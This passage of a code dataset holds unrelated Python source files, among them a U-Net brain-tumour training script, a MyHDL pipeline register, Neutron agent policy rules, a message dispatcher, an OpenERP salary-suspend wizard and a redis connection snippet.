print(\"Not found, exiting...\")\n exit(-1)\n else:\n input_file = open(f'../search_terms_{scraper_name}.txt', 'r')\n read_lines = input_file.readlines()\n\n for lines in read_lines:\n list_of_terms_dirty = lines.strip()\n list_of_terms.append(list_of_terms_dirty)\n\n return list_of_terms\n","sub_path":"scraper-main/CodeBase/helpers.py","file_name":"helpers.py","file_ext":"py","file_size_in_byte":1130,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"532282111","text":"try:\n from queue import Queue, Empty\nexcept:\n from Queue import Queue, Empty\nfrom subprocess import Popen, PIPE\nimport shlex, time, threading\nfrom debug import debug\n\nclass process_handler:\n \n def __init__(self, command, debug = True):\n self.stdout = Queue()\n bufferless_command = \"stdbuf -i0 -o0 -e0 %s\" % (command)\n self.process = Popen(shlex.split(bufferless_command), stdin=PIPE, stdout=PIPE, stderr=PIPE)\n self.enqueue_thread = threading.Thread(target = self.enqueue_stdout_on_thread)\n self.enqueue_thread.start()\n\n def enqueue_stdout_on_thread(self):\n while True:\n b = self.process.stdout.read(1)\n if b == '':\n break\n self.stdout.put(b)\n\n def read(self):\n try:\n b = self.stdout.get(False)\n if debug:\n debug(b)\n return b\n except:\n return ''\n\n #Asynchronous reading with 100ms timeout.\n def read_all(self, delay = 0.1):\n out = \"\"\n b = ''\n while True:\n while b != '':\n out += b\n b = self.read()\n time.sleep(delay)\n b = self.read()\n if b == '':\n return out\n\n def write(self, line):\n if debug:\n debug(line)\n self.process.stdin.write(line.encode())\n\n def write_line(self, line):\n self.write(line + \"\\n\")\n\n def query_line(self, line):\n self.write_line(line)\n return self.read_all()\n\n def kill(self):\n self.process.kill()\n","sub_path":"process_handler.py","file_name":"process_handler.py","file_ext":"py","file_size_in_byte":1582,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"430957911","text":"import argparse\nimport os\nimport glob\nimport random\nimport string\n\nfrom unet3d.data import write_data_to_file, open_data_file\nfrom unet3d.generator import get_training_and_validation_generators\nfrom unet3d.model import isensee2017_model\nfrom unet3d.training import load_old_model, train_model\n\n\ndist_mod = None\nif \"DDL_OPTIONS\" in os.environ:\n import ddl\n dist_mod = ddl\n\nif \"USE_HOROVOD_3DUNET\" in os.environ:\n import tensorflow as tf\n from tensorflow.core.protobuf import rewriter_config_pb2\n from tensorflow.python.keras import backend as K\n import horovod.keras as hvd\n dist_mod = hvd\n # Initialize Horovod\n hvd.init()\n\n # Pin GPU to be used to process local rank (one GPU per process)\n print (\"*****Horovod local rank = \", hvd.local_rank(), \"*****\")\n config = tf.ConfigProto()\n # The below config is needed on non-PowerAI builds of TensorFlow.\n config.graph_options.rewrite_options.memory_optimization = rewriter_config_pb2.RewriterConfig.SCHEDULING_HEURISTICS\n config.gpu_options.allow_growth = True\n config.gpu_options.visible_device_list = str(hvd.local_rank())\n K.set_session(tf.Session(config=config))\n\n\nFLAGS = None\ndef config_memory_optimizer():\n # Set config for memory optimizer\n import tensorflow as tf\n from tensorflow.core.protobuf import rewriter_config_pb2\n from tensorflow.python.keras import backend as K\n config = tf.ConfigProto()\n config.graph_options.rewrite_options.memory_optimization = 
rewriter_config_pb2.RewriterConfig.SCHEDULING_HEURISTICS\n K.set_session(tf.Session(config=config))\n\n# This is needed on non-PowerAI builds of TensorFlow.\n#config_memory_optimizer()\n\ndef setup_input_shape():\n if \"patch_shape\" in config and config[\"patch_shape\"] is not None:\n config[\"input_shape\"] = tuple([config[\"nb_channels\"]] + list(config[\"patch_shape\"]))\n else:\n config[\"input_shape\"] = tuple([config[\"nb_channels\"]] + list(config[\"image_shape\"]))\n\n\nconfig = dict()\nconfig[\"image_shape\"] = (128, 128, 128) # This determines what shape the images will be cropped/resampled to.\nconfig[\"patch_shape\"] = None # switch to None to train on the whole image\nconfig[\"labels\"] = (1, 2, 4) # the label numbers on the input image\nconfig[\"n_base_filters\"] = 16\nconfig[\"n_labels\"] = len(config[\"labels\"])\nconfig[\"all_modalities\"] = [\"t1\", \"t1Gd\", \"flair\", \"t2\"]\nconfig[\"training_modalities\"] = config[\"all_modalities\"] # change this if you want to only use some of the modalities\nconfig[\"nb_channels\"] = len(config[\"training_modalities\"])\nsetup_input_shape()\nconfig[\"truth_channel\"] = config[\"nb_channels\"]\nconfig[\"deconvolution\"] = True # if False, will use upsampling instead of deconvolution\n\nconfig[\"batch_size\"] = 1\nconfig[\"validation_batch_size\"] = 1\nconfig[\"n_epochs\"] = 500 # cutoff the training after this many epochs\nconfig[\"patience\"] = 10 # learning rate will be reduced after this many epochs if the validation loss is not improving\nconfig[\"early_stop\"] = 50 # training will be stopped after this many epochs without the validation loss improving\nif dist_mod:\n config[\"initial_learning_rate\"] = 5e-4 * dist_mod.size()\nelse:\n config[\"initial_learning_rate\"] = 5e-4\nconfig[\"learning_rate_drop\"] = 0.5 # factor by which the learning rate will be reduced\nconfig[\"validation_split\"] = 0.8 # portion of the data that will be used for training\nconfig[\"flip\"] = False # augments the data by randomly flipping an axis during\nconfig[\"permute\"] = True # data shape must be a cube. Augments the data by permuting in various directions\nconfig[\"distort\"] = None # switch to None if you want no distortion\nconfig[\"augment\"] = config[\"flip\"] or config[\"distort\"]\nconfig[\"validation_patch_overlap\"] = 0 # if > 0, during training, validation patches will be overlapping\nconfig[\"training_patch_start_offset\"] = (16, 16, 16) # randomly offset the first patch index by up to this offset\nconfig[\"skip_blank\"] = True # if True, then patches without any target will be skipped\n\nconfig[\"data_file\"] = os.path.abspath(\"brats_data.h5\")\nconfig[\"model_file\"] = os.path.abspath(\"isensee_2017_model.h5\")\nconfig[\"training_file\"] = os.path.abspath(\"isensee_training_ids.pkl\")\nconfig[\"validation_file\"] = os.path.abspath(\"isensee_validation_ids.pkl\")\nconfig[\"overwrite\"] = False # If True, will previous files. 
If False, will use previously written files.\n\n\ndef fetch_training_data_files(return_subject_ids=False):\n training_data_files = list()\n subject_ids = list()\n for subject_dir in glob.glob(os.path.join(os.path.dirname(__file__), \"data\", \"preprocessed\", \"*\", \"*\")):\n subject_ids.append(os.path.basename(subject_dir))\n subject_files = list()\n for modality in config[\"training_modalities\"] + [\"truth\"]:\n subject_files.append(os.path.join(subject_dir, modality + \".nii.gz\"))\n training_data_files.append(tuple(subject_files))\n if return_subject_ids:\n return training_data_files, subject_ids\n else:\n return training_data_files\n\n\ndef main(overwrite=False):\n # convert input images into an hdf5 file\n if overwrite or not os.path.exists(config[\"data_file\"]):\n training_files, subject_ids = fetch_training_data_files(return_subject_ids=True)\n\n write_data_to_file(training_files, config[\"data_file\"], image_shape=config[\"image_shape\"],\n subject_ids=subject_ids)\n data_file_opened = open_data_file(config[\"data_file\"])\n\n if not overwrite and os.path.exists(config[\"model_file\"]):\n model = load_old_model(config[\"model_file\"])\n else:\n # instantiate new model\n model = isensee2017_model(input_shape=config[\"input_shape\"], n_labels=config[\"n_labels\"],\n initial_learning_rate=config[\"initial_learning_rate\"],\n n_base_filters=config[\"n_base_filters\"])\n\n # get training and testing generators\n train_generator, validation_generator, n_train_steps, n_validation_steps = get_training_and_validation_generators(\n data_file_opened,\n batch_size=config[\"batch_size\"],\n data_split=config[\"validation_split\"],\n overwrite=overwrite,\n validation_keys_file=config[\"validation_file\"],\n training_keys_file=config[\"training_file\"],\n n_labels=config[\"n_labels\"],\n labels=config[\"labels\"],\n patch_shape=config[\"patch_shape\"],\n validation_batch_size=config[\"validation_batch_size\"],\n validation_patch_overlap=config[\"validation_patch_overlap\"],\n training_patch_start_offset=config[\"training_patch_start_offset\"],\n permute=config[\"permute\"],\n augment=config[\"augment\"],\n skip_blank=config[\"skip_blank\"],\n augment_flip=config[\"flip\"],\n augment_distortion_factor=config[\"distort\"])\n\n if FLAGS.steps_per_epoch:\n n_train_steps = FLAGS.steps_per_epoch\n if FLAGS.validation_steps:\n n_validation_steps = FLAGS.validation_steps\n\n # run training\n train_model(model=model,\n model_file=config[\"model_file\"],\n training_generator=train_generator,\n validation_generator=validation_generator,\n steps_per_epoch=n_train_steps,\n validation_steps=n_validation_steps,\n initial_learning_rate=config[\"initial_learning_rate\"],\n learning_rate_drop=config[\"learning_rate_drop\"],\n learning_rate_patience=config[\"patience\"],\n early_stopping_patience=config[\"early_stop\"],\n n_epochs=config[\"n_epochs\"],\n lms=FLAGS.lms,\n swapout_threshold=FLAGS.swapout_threshold,\n swapin_groupby=FLAGS.swapin_groupby,\n swapin_ahead=FLAGS.swapin_ahead,\n serialization=FLAGS.serialization,\n serialization_by_size=FLAGS.serialization_by_size,\n sync_mode=FLAGS.sync_mode,\n cuda_profile_epoch=FLAGS.cuda_profile_epoch,\n cuda_profile_batch_start=FLAGS.cuda_profile_batch_start,\n cuda_profile_batch_end=FLAGS.cuda_profile_batch_end)\n data_file_opened.close()\n\n\nif __name__ == \"__main__\":\n parser = argparse.ArgumentParser()\n parser.add_argument('--epochs', type=int,\n default=500,\n help='Number of epochs to run. (Early stopping still '\n 'applies.) 
This parameter is useful for measuring '\n 'epoch times by running a few epochs rather than '\n 'a full training run to convergence.')\n parser.add_argument('--image_size', type=int,\n default=144,\n help='One dimension of the cubic size of the image. For '\n 'example for 192^3, pass 192.')\n parser.add_argument('--data_file_path', type=str,\n default='brats_data.h5',\n help='Path to the h5 data file containing training and '\n 'validation subjects.')\n # LMS parameters\n lms_group = parser.add_mutually_exclusive_group(required=False)\n lms_group.add_argument('--lms', dest='lms', action='store_true',\n help='Enable TFLMS')\n lms_group.add_argument('--no-lms', dest='lms', action='store_false',\n help='Disable TFLMS (Default)')\n parser.set_defaults(lms=False)\n parser.add_argument(\"--swapout_threshold\", type=int, default=-1,\n help='The TFLMS swapout_threshold parameter. See the '\n 'TFLMS documentation for more information. '\n 'Default `-1` (auto mode).')\n parser.add_argument(\"--swapin_groupby\", type=int, default=-1,\n help='The TFLMS swapin_groupby parameter. See the '\n 'TFLMS documentation for more information. '\n 'Default `-1` (auto mode).')\n parser.add_argument(\"--swapin_ahead\", type=int, default=-1,\n help='The TFLMS swapin_ahead parameter. See the '\n 'TFLMS documentation for more information. '\n 'Default `-1` (auto mode).')\n parser.add_argument(\"--serialization\", type=int, default=-1,\n help='The layer to start serialization on. This '\n 'number will be passed to the LMS serialization '\n 'parameter as the start of a slice like this: '\n '[\\'parameter:\\']. See the TFLMS documentation '\n 'for more information. Default -1, no '\n 'serialization.')\n parser.add_argument(\"--serialization_by_size\", type=float, default=0,\n help='Serialize operations in levels of the '\n 'topological sort, if the cumulative memory '\n 'consumption of the level is greater than '\n 'serialization_by_size. The size unit is GiB. '\n 'Default 0 (turn off).')\n parser.add_argument(\"--sync_mode\", type=int, default=0,\n help='Sync mode of TFLMS. See the TFLMS documentation '\n 'for more information. Default: no '\n 'synchronization.')\n parser.add_argument('--steps_per_epoch', type=int,\n default=0,\n help='An override for the number of steps to run in an '\n 'epoch. This is useful when performance profiling '\n 'large resolutions to shorten runtimes. The default '\n 'behavior is to use the number of subjects and '\n 'batch size to calculate the correct number of '\n 'steps.')\n parser.add_argument('--validation_steps', type=int,\n default=0,\n help='An override for the number of validation steps to '\n 'run in an epoch. This is useful when performance '\n 'profiling large resolutions to shorten runtimes. '\n 'The default is to use the default number of '\n 'validation steps given the training/validation '\n 'subject split.')\n parser.add_argument('--randomize_model_name', type=bool,\n default=True,\n help='This will generate a random name for the model on '\n 'each run. Default is True')\n parser.add_argument('--cuda_profile_epoch', type=int,\n default=0,\n help='The epoch in which to start CUDA profiling '\n '(nvvp). Default is 0 (no profiling)')\n parser.add_argument('--cuda_profile_batch_start', type=int,\n default=1,\n help='The batch in which to start CUDA profiling '\n '(nvvp). Default is 1.')\n parser.add_argument('--cuda_profile_batch_end', type=int,\n default=2,\n help='The batch in which to end CUDA profiling '\n '(nvvp). 
Default is 2.')\n FLAGS = parser.parse_args()\n config['n_epochs'] = FLAGS.epochs\n config['image_shape'] = (FLAGS.image_size, FLAGS.image_size, FLAGS.image_size)\n setup_input_shape()\n config['data_file'] = FLAGS.data_file_path\n if FLAGS.randomize_model_name:\n random_part = ''.join(random.choices(string.ascii_lowercase + string.digits, k=8))\n config[\"model_file\"] = os.path.abspath(\"isensee_2017_model_%s.h5\" % random_part)\n print('Generated model filename: %s' % config[\"model_file\"])\n\n main(overwrite=config[\"overwrite\"])\n","sub_path":"brats/train_isensee2017.py","file_name":"train_isensee2017.py","file_ext":"py","file_size_in_byte":13864,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"424985444","text":"import logging\n\nlogging.basicConfig(level=logging.DEBUG,\n format=\"{asctime} {name} {levelname} - {message}\", style=\"{\")\nlog = logging.getLogger()\n\none_str = \"a\"\nlog.debug(one_str)\none = ord(one_str)\nlog.debug(one)\ntwo = one + 1\nlog.debug(two)\nlog.debug(chr(two))","sub_path":"py_ord.py","file_name":"py_ord.py","file_ext":"py","file_size_in_byte":281,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"223086168","text":"from myhdl import *\n\n@block\ndef id_ex(clk, readA_in, readB_in, offset_in, PC_in, RTa_in,\n RTb_in, RS_in, RD_in, WB_in, MemToReg_in, MemWrite_in,\n MemRead_in, lwFlush_in, brFlush_in, funct_in, opCode_in,\n readA_out, readB_out, offset_out, PC_out, RTa_out,\n RTb_out, RS_out, RD_out, WB_out, MemToReg_out, MemWrite_out,\n MemRead_out, lwFlush_out, brFlush_out, funct_out, opCode_out):\n\n class latches:\n readA = intbv(0, 0, 2**32)\n readB = intbv(0, 0, 2**32)\n offset = intbv(0, 0, 2**32)\n PC = intbv(0, 0, 2**32)\n RTa = intbv(0, 0, 2**5)\n RTb = intbv(0, 0, 2**5)\n RS = intbv(0, 0, 2**5)\n RD = intbv(0, 0, 2**5)\n WB = intbv(0, 0, 2**1)\n MemToReg = intbv(0, 0, 2**1)\n MemWrite = intbv(0, 0, 2**1)\n MemRead = intbv(0, 0, 2**1)\n lwFlush = intbv(0, 0, 2**1)\n brFlush = intbv(0, 0, 2**1)\n funct = intbv(0, 0, 2**6)\n opCode = intbv(0, 0, 2**3)\n\n @always(clk.negedge)\n def output():\n readA_out.next = latches.readA\n readB_out.next = latches.readB\n offset_out.next = latches.offset\n PC_out.next = latches.PC\n RTa_out.next = latches.RTa\n RTb_out.next = latches.RTb\n RS_out.next = latches.RS\n RD_out.next = latches.RD\n WB_out.next = latches.WB\n MemToReg_out.next = latches.MemToReg\n MemWrite_out.next = latches.MemWrite\n MemRead_out.next = latches.MemRead\n lwFlush_out.next = latches.lwFlush\n brFlush_out.next = latches.brFlush\n funct_out.next = latches.funct\n opCode_out.next = latches.opCode\n\n @always(clk.posedge)\n def input():\n latches.readA = readA_in\n latches.readB = readB_in\n latches.offset = offset_in\n latches.PC = PC_in\n latches.RTa = RTa_in\n latches.RTb = RTb_in\n latches.RS = RS_in\n latches.RD = RD_in\n latches.WB = WB_in\n latches.MemToReg = MemToReg_in\n latches.MemWrite = MemWrite_in\n latches.MemRead = MemRead_in\n latches.lwFlush = lwFlush_in\n latches.brFlush = brFlush_in\n latches.funct = funct_in\n latches.opCode = opCode_in\n\n return input, output\n","sub_path":"python/ID_EX.py","file_name":"ID_EX.py","file_ext":"py","file_size_in_byte":2239,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"357941820","text":"\"\"\"\n비바라기를 시전하면 (N, 1), (N, 2), (N-1, 1), (N-1, 2)에 비구름이 생긴다. \n구름은 칸 전체를 차지한다. 이제 구름에 이동을 M번 명령하려고 한다. 
\ni번째 이동 명령은 방향 di과 거리 si로 이루어져 있다. 방향은 총 8개의 방향이 있으며,\n 8개의 정수로 표현한다. 1부터 순서대로 ←, ↖, ↑, ↗, →, ↘, ↓, ↙ 이다. 이동을 명령하면 다음이 순서대로 진행된다.\n\n1. 모든 구름이 di 방향으로 si칸 이동한다.\n2. 각 구름에서 비가 내려 구름이 있는 칸의 바구니에 저장된 물의 양이 1 증가한다.\n3. 구름이 모두 사라진다.\n4. 2에서 물이 증가한 칸 (r, c)에 물복사버그 마법을 시전한다. 물복사버그 마법을 사용하면, \n 대각선 방향으로 거리가 1인 칸에 물이 있는 바구니의 수만큼 (r, c)에 있는 바구니의 물이 양이 증가한다.\n 이때는 이동과 다르게 경계를 넘어가는 칸은 대각선 방향으로 거리가 1인 칸이 아니다.\n 예를 들어, (N, 2)에서 인접한 대각선 칸은 (N-1, 1), (N-1, 3)이고, (N, N)에서 인접한 대각선 칸은 (N-1, N-1)뿐이다.\n5. 바구니에 저장된 물의 양이 2 이상인 모든 칸에 구름이 생기고, 물의 양이 2 줄어든다. \n 이때 구름이 생기는 칸은 3에서 구름이 사라진 칸이 아니어야 한다.\n\nM번의 이동이 모두 끝난 후 바구니에 들어있는 물의 양의 합을 구해보자.\n\"\"\"\nfrom copy import deepcopy\n\n# direct2xy : 순서대로 ←, ↖, ↑, ↗, →, ↘, ↓, ↙\ndirect2xy = [[0, 0], [-1, 0], [-1, -1], [0, -1], [1, -1], [1, 0], [1, 1], [0, 1], [-1, 1]]\n\n\ndef cast_skill(MAP, move):\n n = len(MAP)\n cloud_temp = [[False for _ in range(n)] for _ in range(n)] # 구름 true, false\n cloud = deepcopy(cloud_temp)\n # 처음. 비바라기 시전 후 구름 위치 표시 ((N, 1), (N, 2), (N-1, 1), (N-1, 2))\n\n cloud[n - 1][0] = True\n cloud[n - 1][1] = True\n cloud[n - 2][0] = True\n cloud[n - 2][1] = True\n\n for d, s in move:\n new_cloud = deepcopy(cloud_temp)\n dx, dy = direct2xy[d]\n for y in range(n):\n for x in range(n):\n if cloud[y][x]:\n # 1름이 d 방향에서 s만큼 이동 - 경계를 넘은 0에서 왼쪽이나 위쪽이면 -> N-1\n new_y = (n + y + dy * s) % n\n new_x = (n + x + dx * s) % n\n new_cloud[new_y][new_x] = True\n # 2. 비를 내려 칸 +1\n MAP[new_y][new_x] += 1\n\n # 3. 각 구름은 대각선에 물이 1 이상인 칸의 수만큼 물 증가, 이 때 경계를 넘지 못함\n for y in range(n):\n for x in range(n):\n if new_cloud[y][x]:\n for dx, dy in [(-1, -1), (-1, 1), (1, -1), (1, 1)]:\n if 0 <= y + dy < n and 0 <= x + dx < n and MAP[y + dy][x + dx]:\n MAP[y][x] += 1\n \n # 5. 구름 사라짐 & 바구니에 저장된 물의 양이 2 이상인 모든 칸에 구름이 생기고, 물의 양이 2 줄어든다.\n for y in range(n):\n for x in range(n):\n if new_cloud[y][x]:\n new_cloud[y][x] = False\n elif MAP[y][x] >= 2:\n new_cloud[y][x] = True\n MAP[y][x] = MAP[y][x] - 2\n cloud = new_cloud\n return\n\n\ndef main():\n N, M = list(map(int, input().split()))\n MAP = [list(map(int, input().split())) for _ in range(N)]\n move = [list(map(int, input().split())) for _ in range(M)]\n cast_skill(MAP, move)\n print(sum([sum(ele) for ele in MAP]))\n\n\nmain()","sub_path":"백준/Python/카테고리/2회차/pra.py","file_name":"pra.py","file_ext":"py","file_size_in_byte":3763,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"559085411","text":"# Licensed under the Apache License, Version 2.0 (the \"License\"); you may\n# not use this file except in compliance with the License. You may obtain\n# a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS, WITHOUT\n# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. 
See the\n# License for the specific language governing permissions and limitations\n# under the License.\n\nfrom oslo_policy import policy\n\nfrom neutron.conf.policies import base\n\n\nCOLLECTION_PATH = '/agents'\nRESOURCE_PATH = '/agents/{id}'\n\n\nrules = [\n policy.DocumentedRuleDefault(\n 'get_agent',\n base.RULE_ADMIN_ONLY,\n 'Get an agent',\n [\n {\n 'method': 'GET',\n 'path': COLLECTION_PATH,\n },\n {\n 'method': 'GET',\n 'path': RESOURCE_PATH,\n },\n ]\n ),\n policy.DocumentedRuleDefault(\n 'update_agent',\n base.RULE_ADMIN_ONLY,\n 'Update an agent',\n [\n {\n 'method': 'PUT',\n 'path': RESOURCE_PATH,\n },\n ]\n ),\n policy.DocumentedRuleDefault(\n 'delete_agent',\n base.RULE_ADMIN_ONLY,\n 'Delete an agent',\n [\n {\n 'method': 'DELETE',\n 'path': RESOURCE_PATH,\n },\n ]\n ),\n policy.DocumentedRuleDefault(\n 'create_dhcp-network',\n base.RULE_ADMIN_ONLY,\n 'Add a network to a DHCP agent',\n [\n {\n 'method': 'POST',\n 'path': '/agents/{agent_id}/dhcp-networks',\n },\n ]\n ),\n policy.DocumentedRuleDefault(\n 'get_dhcp-networks',\n base.RULE_ADMIN_ONLY,\n 'List networks on a DHCP agent',\n [\n {\n 'method': 'GET',\n 'path': '/agents/{agent_id}/dhcp-networks',\n },\n ]\n ),\n policy.DocumentedRuleDefault(\n 'delete_dhcp-network',\n base.RULE_ADMIN_ONLY,\n 'Remove a network from a DHCP agent',\n [\n {\n 'method': 'DELETE',\n 'path': '/agents/{agent_id}/dhcp-networks/{network_id}',\n },\n ]\n ),\n policy.DocumentedRuleDefault(\n 'create_l3-router',\n base.RULE_ADMIN_ONLY,\n 'Add a router to an L3 agent',\n [\n {\n 'method': 'POST',\n 'path': '/agents/{agent_id}/l3-routers',\n },\n ]\n ),\n policy.DocumentedRuleDefault(\n 'get_l3-routers',\n base.RULE_ADMIN_ONLY,\n 'List routers on an L3 agent',\n [\n {\n 'method': 'GET',\n 'path': '/agents/{agent_id}/l3-routers',\n },\n ]\n ),\n policy.DocumentedRuleDefault(\n 'delete_l3-router',\n base.RULE_ADMIN_ONLY,\n 'Remove a router from an L3 agent',\n [\n {\n 'method': 'DELETE',\n 'path': '/agents/{agent_id}/l3-routers/{router_id}',\n },\n ]\n ),\n policy.DocumentedRuleDefault(\n 'get_dhcp-agents',\n base.RULE_ADMIN_ONLY,\n 'List DHCP agents hosting a network',\n [\n {\n 'method': 'GET',\n 'path': '/networks/{network_id}/dhcp-agents',\n },\n ]\n ),\n policy.DocumentedRuleDefault(\n 'get_l3-agents',\n base.RULE_ADMIN_ONLY,\n 'List L3 agents hosting a router',\n [\n {\n 'method': 'GET',\n 'path': '/routers/{router_id}/l3-agents',\n },\n ]\n ),\n]\n\n\ndef list_rules():\n return rules\n","sub_path":"neutron/conf/policies/agent.py","file_name":"agent.py","file_ext":"py","file_size_in_byte":3859,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"264049872","text":"# -*- coding: utf-8 -*-\n# vi:si:et:sw=4:sts=4:ts=4\n\nimport asyncio\nimport logging\n\nfrom .conf import settings\nfrom .exceptions import RejectMessage, IgnoreMessage\nfrom .utils import import_callable\n\nlogger = logging.getLogger(__name__)\n\n\nclass LoaferDispatcher(object):\n\n def __init__(self, routes, consumers=None):\n self.routes = routes\n self.consumers = consumers or []\n self._semaphore = asyncio.Semaphore(settings.LOAFER_MAX_JOBS)\n self._stop_consumers = True\n\n def get_consumer(self, route):\n for consumer in self.consumers:\n if consumer.source == route.source:\n return consumer\n\n # no consumer for given route, return default\n klass = import_callable(settings.LOAFER_DEFAULT_CONSUMER_CLASS)\n options = settings.LOAFER_DEFAULT_CONSUMER_OPTIONS\n return klass(route.source, options)\n\n def 
_translate_message(self, message, route):\n # in the future, we may change the route depending on message content\n try:\n content = route.message_translator.translate(message)['content']\n except Exception as exc:\n logger.exception(exc)\n logger.error('Error translating message content')\n return None\n\n return content\n\n async def dispatch_message(self, message, route):\n logger.info('Dispatching message to route={}'.format(route))\n\n content = self._translate_message(message, route)\n if content is None:\n logger.warning('Message will be ignored:\\n{}\\n'.format(message))\n return False\n\n # Since we don't know what will happen on message handler, use semaphore\n # to protect scheduling or executing too many coroutines/threads\n with await self._semaphore:\n try:\n await route.deliver(content)\n except RejectMessage as exc:\n logger.exception(exc)\n logger.warning('Explicit message rejection:\\n{}\\n'.format(message))\n # eg, we will return True at the end\n except IgnoreMessage as exc:\n logger.exception(exc)\n logger.warning('Explicit message ignore:\\n{}\\n'.format(message))\n return False\n except asyncio.CancelledError as exc:\n msg = '\"{}\" was cancelled, the message will be ignored:\\n{}\\n'\n logger.warning(msg.format(route.handler_name, message))\n return False\n except Exception as exc:\n logger.exception(exc)\n logger.error('Unhandled exception on {}'.format(route.handler_name))\n return False\n\n return True\n\n async def dispatch_consumers(self, sentinel=None):\n if sentinel is None or not callable(sentinel):\n self._stop_consumers = False\n stopper = self._default_sentinel\n else:\n stopper = sentinel\n\n while not stopper():\n for route in self.routes:\n consumer = self.get_consumer(route)\n messages = await consumer.consume()\n for message in messages:\n confirmation = await self.dispatch_message(message, route)\n if confirmation:\n await consumer.confirm_message(message)\n\n def _default_sentinel(self):\n return self._stop_consumers\n\n def stop_consumers(self):\n logger.info('Stopping consumers')\n self._stop_consumers = True\n","sub_path":"loafer/dispatcher.py","file_name":"dispatcher.py","file_ext":"py","file_size_in_byte":3502,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"619254452","text":"#Import statements\nfrom tkinter import *\n\n#Class for the GUI\nclass TopicGUI:\n def __init__(self, master, topic):\n canvas = topic\n canvas.pack(side = \"top\", fill = \"x\")\n\n#GUI Class for Tweet Data Graph\n#Based on code from:\n#https://www.daniweb.com/software-development/python/code/216816/draw-a-bar-graph-python\nclass tweetTopic(Canvas):\n #Constructor\n def __init__(self, master, entries, header):\n canvas_width = 1134\n canvas_height = 400\n Canvas.__init__(self, master, width = canvas_width, height = canvas_height, bg = \"white\")\n\n self.populateTopic(entries, canvas_width, canvas_height, header) \n\n #Populate graph\n def populateTopic(self, entries, width, height, header):\n x_gap = 130 #gap between left edge and y axis\n x_text_gap = 20 #gap between left edge and text beside y axis\n y_header_gap = 30 #gap between top edge and upper x axis\n y_gap = 20 #gap between lower edge and x axis\n x_max = width - x_gap * 2 #maximum width of bar\n for ctr in range(int(len(entries)/2)):\n entry_date = entries[ctr * 2]\n entry_topics = entries[(ctr * 2) + 1]\n x0 = x_gap\n y1 = (ctr + 1) * 20 + y_header_gap\n self.create_text(x_text_gap, y1, anchor = SW, text = entry_date) \n self.create_text(x0 - 40, y1, 
anchor = SW, text = entry_topics)\n self.create_text(x_text_gap, y_gap, anchor = SW, text = header)\n \n","sub_path":"topicgui.py","file_name":"topicgui.py","file_ext":"py","file_size_in_byte":1480,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"340727426","text":"# -*- coding: utf-8 -*-\n##############################################################################\n#\n# NCTR, Nile Center for Technology Research\n# Copyright (C) 2011-2012 NCTR ().\n#\n##############################################################################\nfrom osv import fields,osv\nimport pooler\nimport time\nfrom tools.translate import _\n\nsuspend_type = [\n ('suspend', 'Suspend'),\n ('resume', 'Resume'),\n]\n\n\n#----------------------------------------\n#employee suspend\n#----------------------------------------\nclass emp_suspend(osv.osv_memory):\n _name ='emp.suspend'\n\n _columns = {\n\t\n 'employee_id': fields.many2one('hr.employee','Employees',required=True),\n 'suspend_date' :fields.date(\"Suspend Date\", required= True),\n\t'comments':fields.char(\"Comments\"),\n 'suspend_type':fields.selection(suspend_type,\"Suspend/Resume\"),\n 'company_id': fields.many2one('res.company','Company',readonly=True),\n }\n _defaults = {\n 'company_id': lambda self, cr, uid, c: self.pool.get('res.company')._company_default_get(cr, uid, 'emp.suspend', context=c),\n\t\t}\n\n\n def emp_suspend(self, cr, uid,ids, context=None):\n \"\"\"suspend and resume empployee salary.\n @return: dectionary \n \"\"\"\n for t in self.browse( cr, uid,ids):\n emp_obj = self.pool.get('hr.employee')\n susp_arch_obj = self.pool.get('hr.basic.salary.suspend.archive')\n employee = emp_obj.read(cr, uid, t.employee_id.id, ['salary_suspend'], context=context)\n if t.suspend_type == 'suspend':\n if employee['salary_suspend']:\n raise osv.except_osv(_('Sorry'), _('This Employee is Already Suspend'))\n sal_susp = True\n else:\n if not employee['salary_suspend']:\n raise osv.except_osv(_('Sorry'), _('This Employee is Already Resumed'))\n sal_susp = False\n susp_arch_vals = {\n 'employee_id': t.employee_id.id,\n 'suspend_date': t.suspend_date,\n 'comments': t.comments ,\n 'suspend_type': t.suspend_type ,\n }\n susp_arch_obj.create(cr, uid, susp_arch_vals, context=context)\n emp_obj.write(cr, uid, [t.employee_id.id], {'salary_suspend':sal_susp}, context=context)\n return {} \n\n\nemp_suspend()\n\n","sub_path":"v_7/Dongola/addons_backup/9-1/hr_payroll_custom/hr_payroll_custom/wizard/employee_salary_suspended.py","file_name":"employee_salary_suspended.py","file_ext":"py","file_size_in_byte":2401,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"274746040","text":"# -*- coding:utf-8 -*-\nimport redis\nfrom honeycomb import Dict\n\nSOCIAL_REDIS_ONLINE = \\\n {\n 'host': '192.20.20.8',\n 'port': 6376,\n 'db': 3\n }\n\nSOCIAL_REDIS_LOCAL = \\\n {\n 'host': '172.100.102.101',\n 'port': 6379,\n 'db': 0\n }\n\ntry:\n init_conf = Dict(key='project_honey_init')\n environ = init_conf['environ']\n SOCIAL_REDIS = SOCIAL_REDIS_LOCAL if environ == 'local_debug' else SOCIAL_REDIS_ONLINE\nexcept Exception:\n SOCIAL_REDIS = SOCIAL_REDIS_ONLINE\n\n\nclass MessageBean(object):\n def __init__(self, msg):\n info_list = msg[0].split('_')\n timestamp = msg[1]\n self.executor_id = info_list[0]\n self.action = info_list[1]\n self.obj = info_list[2]\n self.obj_id = info_list[3]\n self.timestamp = int(timestamp)\n\n\ndef get_production_redis_object():\n redis_object = 